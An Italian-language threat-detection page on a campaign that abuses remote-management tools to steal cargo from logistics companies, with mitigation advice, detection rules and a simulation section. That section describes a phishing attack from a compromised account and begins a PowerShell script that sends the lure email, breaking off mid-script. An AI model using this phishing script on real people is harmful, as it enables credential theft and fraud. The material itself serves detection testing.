Accesso Remoto, Vero Carico: I Criminali Informatici Prendono di Mira Camion e Logistica
Detection stack
- AIDR
- Alert
- ETL
- Query
Trasformazione Digitale del Furto di Carico
Gruppi di criminali informatici stanno compromettendo le aziende di trasporti e logistica distribuendo strumenti di monitoraggio e gestione remota (RMM) per ottenere il controllo dei sistemi, utilizzando poi l’accesso per pubblicare carichi falsi, fare offerte sulle spedizioni e rubare carico fisico per guadagni finanziari.
Indagine
Il cluster di minacce è attivo da almeno giugno 2025 e utilizza prodotti RMM come ScreenConnect, SimpleHelp, PDQ Connect, Fleetdeck, N‑able e LogMeIn Resolve. Dopo l’accesso iniziale tramite account load-board compromessi o email di phishing, gli attori eseguono ricognizioni di rete e implementano raccoglitori di credenziali come WebBrowserPassView. Sfruttano quindi i flussi di lavoro del settore per pubblicare carichi fraudolenti e coordinare il furto. La campagna sfrutta installatori RMM legittimi firmati per eludere il rilevamento ed è stata collegata ad attività precedenti che distribuivano NetSupport e altri stealer.
Mitigazione
Le organizzazioni dovrebbero limitare l’installazione di software RMM non approvato, implementare regole di rilevamento di rete per domini e firme RMM conosciuti, bloccare file eseguibili e MSI consegnati via email da mittenti esterni, applicare l’autenticazione multi-fattore per account load-board ed email, e fornire formazione agli utenti per riconoscere i tentativi di phishing.
Risposta
Se viene rilevata una compromissione, isolare i punti finali interessati, revocare le credenziali compromesse, rimuovere agenti RMM non autorizzati, condurre un’analisi forense per identificare l’infrastruttura C2, e notificare le forze dell’ordine e i fornitori di assicurazioni. Rivedere e rinforzare la sicurezza degli account load-board e monitorare per la pubblicazione di carichi fraudolenti.
Flusso di Attacco
Rilevamenti
Possibile Attività di Comando e Controllo tramite Comunicazione Dominio Software di Accesso Remoto…
Visualizza
IOC (ip) da rilevare: Accesso remoto, carico reale: criminali informatici che prendono di mira il trasporto e…
Visualizza
IOC (hash) da rilevare: Accesso remoto, carico reale: criminali informatici che prendono di mira il trasporto e…
Visualizza
Rilevamento di URL Malevoli in Email Destinate a Aziende di Logistica [Email]
Visualizza
Rilevamento di Installazione di Strumenti di Monitoraggio e Gestione Remota e Raccolta di Credenziali [Creazione Processo Windows]
Visualizza
Istruzioni di Simulazione
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Motivo: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi dell’Attacco:
Un avversario ha compromesso l’account email di un manager senior della logistica (“carla@logistics.com”). Per massimizzare il successo della consegna, l’attaccante risponde a un thread esistente su una spedizione recente (“conferma carico”) e inserisce un collegamento malevolo che punta a un installatore eseguibile per uno strumento di Monitoraggio e Gestione Remota (RMM). La linea dell’oggetto contiene deliberatamente la parola “carico” per soddisfare il filtro dell’oggetto della regola. Quando il destinatario clicca sul link, i log della connessione di rete mostreranno una richiesta HTTP in uscita a un dominio malevolo che serve un.exee.msipayload.- Componi email malevola (l’oggetto include “carico”, il corpo contiene le stringhe “.exe” e “.msi”).
- Invia tramite l’account compromesso.
-
Facoltativamente, simula il clic invocando
Invoke-WebRequestdalla macchina vittima per generare la telemetria della connessione di rete.
-
Script di Test di Regressione:
<# Simulation script for T1219 / T1566.001. Steps: 1. Send malicious email with required strings. 2. (Optional) Simulate a click to generate network traffic. #> # ==== 1. Send malicious email ==== $smtpServer = "smtp.mycompany.com" $from = "carla@logistics.com" $to = "dave@logistics.com" $subject = "Load Confirmation – Action Required" $body = @" Hi Dave, Please review the updated load details and download the latest processing tool: